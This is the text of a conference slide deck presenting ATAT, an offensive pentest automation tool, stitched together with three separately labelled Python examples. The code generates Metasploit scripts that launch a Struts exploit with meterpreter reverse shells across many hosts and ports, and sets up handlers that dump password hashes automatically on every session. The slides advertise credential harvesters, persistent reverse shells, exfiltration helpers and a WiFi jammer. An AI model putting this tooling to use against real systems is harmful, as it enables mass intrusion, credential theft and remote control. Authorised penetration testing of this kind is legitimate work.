Attack Team Automation Tool – Taking on the entire rebellion with 2-3 Stormtroopers • *with Empire approved images & content
About – ll3N1GmAll Ath, Sec-, C+, D12 • Sith • Hacker • Lock pick village guy • BSidesSTL co-founder • Physical security course instructor • Infosec dentist (see Jayson Street’s talk on failure) • Certified cert haver (with 12 essential certifications & minerals!) • Daniel 11:32b (KJV)
Impetus –(╯°□°)╯︵ ┻━┻ • Vulnerability reports missing items like…ports… • Yeah, apparently that’s a thing • Large scopes, small squads, & tight deadlines • The need to use “Empire approved” existing tools • Features I wished existed but didn’t • Efficiency • Repeatability • Automation • Starts services, automates repetitive actions, etc. • Noobs
Substance • Simplicity is the best design choice • Well known, industry standard, Empire approved tools given ergonomic handles and “auto-pilot” functions • PowerShell Empire • Metasploit • Msfvenom • LBD • SSLScan • masscan • MPC • DBD • Still under active development • Fully automated Windows, OSX, & Linux privilege escalation with PowerShell Empire • PoC attacks
Origin • Metasploit automation script called “ezsploit” by rand0m1ze on GitHub • ATAT is to ezsploit what SET is to BBQSQL • Nearly identical menu structure and layout • Every existing option has been completely rewritten and/or enhanced significantly • Except for 2; more on those later • Many new options that did not exist in the original script • ATAT has over 500% more Rebel smashing goodness than its predecessor!
Features – Payloads • Create every conceivable Metasploit payload via MPC with ATAT’s built in payload creation “wizard”…I hate that term… • No AV gigs • All OSes • AV WIP
Features – Multi-Target Exploitation • Basically RHOSTS for exploit modules with common options • Works with modules that require only LHOST, LPORT, RHOST, RPORT & PAYLOAD (or a subset of those) • This limitation is overcome by creating separate menu options for unique exploit types, as you will see
Features – Multi-Target Struts/Tomcat • RHOSTS feature for Apache Struts & Tomcat exploit modules • Adds: • SRVPORT • TARGETURI • HttpUsername • HttpPassword
Features – Multi-Target Java JMX • RHOSTS feature for the Java JMX exploit module • Adds: • SRVPORT • JMXRMI
Features – Multi-Target Java RMI • RHOSTS feature for the Java RMI exploit module • Adds: • SRVPORT • HTTPDELAY
Features – Multi-Target SNMP Enum • Support for SNMP enumeration AUX module • Integrated for simplicity; not necessity
Features – Multi-Target LBD • Multi-target load balancer detection • All results echo to screen along with being captured in a log within the ATAT directory
Features – Multi-Target Masscan all TCP • Masscan all TCP ports (0-65535) against multiple targets • Rate limited enough to prevent network meltdown while still scanning very fast • All results echo to screen and are captured in a log within the ATAT directory • Pause/Resume supported • Automatically feeds SSLScan
Features – Multi-Target SSLScan • Multi-target SSLScan script (auto-fed by masscan/nmap) • All results echo to screen along with being captured in a log within the ATAT directory • Results further sorted into these groups: • RC4, SSLv2, heartbleed, freak, weak ciphers, expired certs, SSL certs found
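The masscan-to-SSLScan hand-off described on the two slides above, as an added example (this is not ATAT's own code). It assumes masscan is run with list output (`-oL`), whose data lines read `open tcp <port> <ip> <timestamp>`; the `--rate` value is a placeholder; the grouping into RC4, SSLv2, heartbleed, freak, weak ciphers, expired certs and SSL certs found is done by keyword matching on sslscan's plain-text output; and the masscan and sslscan outputs embedded below are constructed samples, not real scan results.

```python
"""Added example, not ATAT's own code: masscan -> sslscan hand-off with the
sslscan output sorted into the slide's groups. Assumptions (not from the
slides): masscan -oL list format, placeholder --rate, keyword matching on
sslscan text output, constructed sample outputs."""
from datetime import datetime


def masscan_command(targets, rate=1000, outfile="masscan-all-tcp.txt"):
    """All-TCP masscan with a modest --rate (placeholder). Ctrl-C makes
    masscan write paused.conf; `masscan --resume paused.conf` continues."""
    return ["masscan", "-p0-65535", "--rate", str(rate), "-oL", outfile, *targets]


def parse_masscan_list(text):
    """Sorted, de-duplicated (ip, port) pairs for open TCP ports in -oL output."""
    hits = set()
    for line in text.splitlines():
        parts = line.split()          # "open tcp 443 10.0.0.5 1577836800"
        if len(parts) >= 4 and parts[0] == "open" and parts[1] == "tcp":
            hits.add((parts[3], int(parts[2])))
    return sorted(hits)


def sslscan_commands(hits):
    """One sslscan per open port: TLS may sit on any port masscan found."""
    return [["sslscan", "--no-colour", f"{ip}:{port}"] for ip, port in hits]


def classify(output, now=None):
    """Return the set of slide groups one sslscan text output falls into."""
    now = now or datetime.now()
    groups = set()
    for raw in output.splitlines():
        line = " ".join(raw.split())  # collapse sslscan's column padding
        if line.startswith(("Accepted ", "Preferred ")):
            # e.g. "Accepted TLSv1.0 128 bits RC4-SHA [curve/DHE details]"
            _, proto, bits, _, rest = line.split(" ", 4)
            cipher, bits = rest.split(" ")[0], int(bits)
            if proto == "SSLv2":
                groups.add("SSLv2")
            if "RC4" in cipher:
                groups.add("RC4")
            if cipher.startswith("EXP"):        # export-grade suite: FREAK exposure
                groups.add("freak")
            if bits < 128 or "NULL" in cipher or "ADH" in cipher or "AECDH" in cipher:
                groups.add("weak ciphers")
        elif line.endswith("vulnerable to heartbleed") and " not vulnerable" not in line:
            groups.add("heartbleed")
        elif line.startswith("Subject:"):
            groups.add("SSL certs found")
        elif line.startswith("Not valid after:"):
            expiry = datetime.strptime(line.split(":", 1)[1].strip(),
                                       "%b %d %H:%M:%S %Y GMT")
            if expiry < now:
                groups.add("expired certs")
    return groups


def bucket(scans, now=None):
    """scans: {target: sslscan_output} -> {group: sorted list of targets}."""
    out = {}
    for target, output in scans.items():
        for group in classify(output, now):
            out.setdefault(group, []).append(target)
    return {g: sorted(t) for g, t in sorted(out.items())}


# Constructed sample data (not real scan output).
SAMPLE_MASSCAN = """#masscan
open tcp 443 10.0.0.5 1577836800
open tcp 8443 10.0.0.5 1577836801
open tcp 22 10.0.0.6 1577836802
open tcp 443 10.0.0.5 1577836803
# end
"""
SAMPLE_SSLSCAN = {
    "10.0.0.5:443": """Testing SSL server 10.0.0.5 on port 443
TLSv1.0 vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  RC4-SHA
Accepted  SSLv2    128 bits  RC4-MD5
Accepted  TLSv1.0  40 bits   EXP-RC4-MD5
Subject:  www.example.com
Not valid after:  Jan  1 00:00:00 2018 GMT
""",
    "10.0.0.5:8443": """Testing SSL server 10.0.0.5 on port 8443
TLSv1.2 not vulnerable to heartbleed
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
Subject:  admin.example.com
Not valid after:  Jan  1 00:00:00 2030 GMT
""",
}


def demo():
    """Run the grouping over the constructed samples at a fixed report date."""
    return bucket(SAMPLE_SSLSCAN, now=datetime(2019, 1, 1))


if __name__ == "__main__":
    print(masscan_command(["10.0.0.0/24"]))
    for cmd in sslscan_commands(parse_masscan_list(SAMPLE_MASSCAN)):
        print(" ".join(cmd))
    for group, targets in demo().items():
        print(f"{group}: {', '.join(targets)}")
```

The duplicate masscan line for 10.0.0.5:443 is deliberate: masscan can report a port more than once, and the hand-off de-duplicates before launching sslscan so a host is not scanned twice. Anything on a port that does not speak TLS simply produces no `Accepted`/`Subject:` lines and lands in no group.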
Features – Bloodhound • Installs Bloodhound and dependencies • Provides instructions for simple 1st time setup • Launches Neo4j console and Bloodhound interface automatically
Features – Multi-Port Exploit • Launch 1 exploit at 1 target on multiple ports • Why? • Remember my earlier mention of vulnerability scan reports with port information missing? • When service identification isn’t providing clear information…_______ all the _______!!! • Non-standard • Banner/ID Fails • RPORTS
Features – Multi-Port Auxiliary • Launch 1 auxiliary module against many hosts (where RHOSTS is supported) & against as many ports on each host as you wish • Basically RPORTS functionality for AUX modules • Again, for checking targets with reports of a vulnerability without complete information about where the service is running • And where the service may not be running on a standard port • Hopefully none of you find yourself in need of these multi-port features; but if you do…nothing else will do… • Searching for things on random ports
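The multi-target and multi-port features described above, as an added example (not ATAT's own code): a generator for msfconsole resource scripts that gives exploit modules RHOSTS-like behaviour (one host at a time) and gives exploit and auxiliary modules RPORTS-like behaviour (many ports per host). The host lists, port lists and option values are constructed for the demonstration; the module names are real Metasploit modules chosen as illustrations, and which options any given module actually needs must be confirmed with `show options` in msfconsole.

```python
"""Added example, not ATAT's own code: resource-script generator for
multi-target (RHOSTS-like) and multi-port (RPORTS-like) module runs.
Hosts, ports and option values are constructed; module names are real
Metasploit modules used as illustrations."""
from itertools import product

# Options the slides' generic multi-target menu handles on its own.
BASE_OPTIONS = {"LHOST", "LPORT", "RHOST", "RPORT", "PAYLOAD"}


def extra_options(required):
    """Required option names the generic menu cannot supply. A non-empty
    result is why Struts/Tomcat, JMX and RMI get their own menu entries
    (TARGETURI, SRVPORT, JMXRMI, HTTPDELAY, ...)."""
    return sorted(set(required) - BASE_OPTIONS)


def resource_script(module, hosts, ports, options=None, payload=None,
                    auxiliary=False, rhosts=False):
    """Text for `msfconsole -r <file>`.

    - exploit modules: one `exploit -z` per (host, port) pair; -z stops
      msfconsole from interacting with a new session so the loop continues.
    - auxiliary modules with RHOSTS support (rhosts=True): all hosts set at
      once and one `run` per port.
    - auxiliary modules without RHOSTS support: one `run` per (host, port).
    """
    lines = [f"use {module}"]
    if payload:
        lines.append(f"set PAYLOAD {payload}")
    for name, value in (options or {}).items():
        lines.append(f"set {name} {value}")
    if auxiliary and rhosts:
        lines.append(f"set RHOSTS {' '.join(hosts)}")
        for port in ports:
            lines += [f"set RPORT {port}", "run"]
    else:
        # Pre-MSF5 exploit modules take a single RHOST; newer versions also
        # accept RHOSTS on exploits, but RHOST still works as an alias.
        target_opt = "RHOSTS" if auxiliary else "RHOST"
        action = "run" if auxiliary else "exploit -z"
        for host, port in product(hosts, ports):
            lines += [f"set {target_opt} {host}", f"set RPORT {port}", action]
    return "\n".join(lines) + "\n"


def main():
    hosts = ["10.0.0.5", "10.0.0.6"]   # constructed
    ports = [8080, 8443, 9090]         # constructed: "Struts somewhere", port unknown
    required = ["RHOST", "RPORT", "LHOST", "LPORT", "PAYLOAD", "TARGETURI"]
    print("needs its own menu entry for:", extra_options(required))
    print(resource_script(
        "exploit/multi/http/struts2_content_type_ognl", hosts, ports,
        {"LHOST": "10.0.0.1", "LPORT": 4444, "TARGETURI": "/struts2-showcase/"},
        payload="linux/x64/meterpreter/reverse_tcp"))
    print(resource_script(
        "auxiliary/scanner/snmp/snmp_enum", hosts, [161, 1161],
        auxiliary=True, rhosts=True))


if __name__ == "__main__":
    main()
```

Write the output to a file and launch it with `msfconsole -q -r multi.rc`; each attempt is sequential, so with three ports on two hosts the script runs six exploit attempts before returning to the prompt.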
Features – Listeners & PostEx • Create any type of listener Metasploit has to offer, with built in intelligent automated post exploitation • Identifies the target’s platform • Runs a wide array of applicable post exploitation modules using MSF’s own relied upon logic, but with a larger set of post exploitation modules than MSF’s default
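A handler whose AutoRunScript chains platform-appropriate post modules, as an added example of the automated post exploitation described above (this is not ATAT's code, and the module list is not ATAT's list). It assumes the platform can be read from the payload name, that the post modules chosen are this example's own selection of real Metasploit modules, and that `multi_console_command -rc <file>` (Metasploit's stock Meterpreter script for running a command file when a session opens) is the mechanism used.

```python
"""Added example, not ATAT's own code: multi/handler resource script whose
AutoRunScript runs a platform-specific set of post modules on every new
session. The platform is inferred from the payload name; POST_MODULES is this
example's own selection of real Metasploit modules, not ATAT's list."""
import os
import tempfile

POST_MODULES = {
    "windows": [
        "post/windows/gather/checkvm",
        "post/windows/gather/enum_logged_on_users",
        "post/windows/gather/smart_hashdump",
        "post/multi/recon/local_exploit_suggester",
    ],
    "linux": [
        "post/linux/gather/enum_system",
        "post/linux/gather/enum_configs",
        "post/linux/gather/hashdump",
        "post/multi/recon/local_exploit_suggester",
    ],
    "osx": [
        "post/osx/gather/enum_osx",
        "post/osx/gather/hashdump",
        "post/multi/recon/local_exploit_suggester",
    ],
}


def platform_of(payload):
    """Metasploit payload names start with the platform (windows/x64/...)."""
    head = payload.split("/", 1)[0]
    if head not in POST_MODULES:
        raise ValueError(f"no post-exploitation set for payload platform {head!r}")
    return head


def post_commands(platform):
    """Commands multi_console_command feeds to the new session; each
    `run post/...` executes in that session's Meterpreter console."""
    return [f"run {module}" for module in POST_MODULES[platform]]


def handler_script(payload, lhost, lport, post_rc_path):
    """Resource script for the listener. -j -z backgrounds the handler and
    hands sessions straight to the AutoRunScript; ExitOnSession false keeps
    it listening for further callbacks."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        f"set AutoRunScript multi_console_command -rc {post_rc_path}",
        "exploit -j -z",
    ]) + "\n"


def build(payload, lhost, lport, directory):
    """Write <directory>/post-<platform>.rc and <directory>/handler.rc."""
    platform = platform_of(payload)
    post_rc = os.path.join(directory, f"post-{platform}.rc")
    handler_rc = os.path.join(directory, "handler.rc")
    with open(post_rc, "w") as f:
        f.write("\n".join(post_commands(platform)) + "\n")
    with open(handler_rc, "w") as f:
        f.write(handler_script(payload, lhost, lport, post_rc))
    return handler_rc, post_rc


if __name__ == "__main__":
    # Constructed values for the demonstration.
    workdir = tempfile.mkdtemp(prefix="atat-example-")
    handler_rc, post_rc = build("windows/x64/meterpreter/reverse_https",
                                "10.0.0.1", 443, workdir)
    print(open(handler_rc).read())
    print(open(post_rc).read())
    print(f"launch with: msfconsole -q -r {handler_rc}")
```

Because the platform is fixed when the listener is created, a payload that does not name one (java/..., python/...) is rejected rather than guessed; those sessions need the platform read from `sysinfo` after the fact instead.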
Features – Persistence • Durandal backdoor builder by Skysploit (Travis Weathers) • Updated to work with newer gcc-mingw-w64-i686 compiler • Persistent encrypted daemonized reverse shells for: • Windows • Linux/NetBSD/FreeBSD/OpenBSD • Required significant fixes to function • Persistent encrypted daemonized bind shells for: • Windows • Work in progress • Linux/NetBSD/FreeBSD/OpenBSD • Work in progress • Android Meterpreter APK builder • Encrypted (HTTPS protocol) • Persistent • Stable
Features – Empire & DeathStar • Launches Powershell Empire Console & RESTful API • Launches DeathStar Domain Admin Automation Tool • Admin PSE REST API • Create/Kill/Use • Listeners • Stagers – WIP 21/31 • Agents • Fully Automated Post Ex • Windows – WIP • Linux – WIP • OSX – WIP
Features – Wireless Attacks • HostAPD-WPE • Enterprise WPA Fake RADIUS Attacks • Enterprise WPA Challenge / Response Pair Cracking • Asleap • John The Ripper • Airgeddon • DoS • WPA/WPA2 Online & Offline Attacks • Aircrack • Hashcat • Handshake tools (capturing & cleaning) • Evil Twin / Rogue AP Attacks • WPS Attacks • Reaver • Bully • WEP Attacks • Why not right? • WiFi Jammer
Features – Data Exfiltration • Push Files via SCP • Creds required • Generates SCP command syntax for uploading to target • Push Files with Powershell & Meterpreter • Starts Apache • Generates MSF command for uploading files to target • Generates PSH command for pulling files from attacker machine to target • Pull Files with Meterpreter • Generates MSF command to download files from target via Meterpreter • Wireless Password Stealer (plaintext) • Windows 32 & 64 bit Credential Harvester • Grabs nearly every imaginable password and private key type
Features – Dependency Checker Prepare, charge, & make ready the laser cannons Installs and/or configures: • PowerShell Empire • DeathStar • pip install various python dependencies • gcc • gcc-mingw-w64-i686 • DBD • Curl • Jq • Bettercap • HostAPD-WPE • Airgeddon • Bloodhound • Etc., Etc., Etc….
Remaining Items –¯\_(ツ)_/¯ • Option 3 – Msfconsole • Shortcut to launch msfconsole; very minor fixes to make this work • Otherwise, no reason to alter this • Option 5 – Armitage • Shortcut to launch Armitage GUI; very minor fixes to make this work • Otherwise, no reason to alter this *this slide not approved by the Galactic Empire
Platforms • Tested on: • Kali • Parrot OS • Kali chroot environment on Android • Use the ATAT-chroot GitHub repo, which has been customized for use in a Kali chroot environment
Demo Time • Exploit with automated post exploitation
Source • https://github.com/ll3N1GmAll/ATAT • Compatible with the current gcc-MingW-W64 compiler package that is available on newer systems (32 & 64 bit) • https://github.com/ll3N1GmAll/ATAT-chroot • Ported to chroot environment for Android mobile usage • https://github.com/ll3N1GmAll/ATAT_deprecated • Compatible with the older MingW32 compiler package on older systems (32 & 64 bit) • No longer maintained
Contacts (twits & IRC) • @ll3NiGmAll • Not very active on the twits • ll3N1GmAll • Much more active on IRC • lll3N1GmAlll • Alternate nick • Email/Etc. • Come talk to me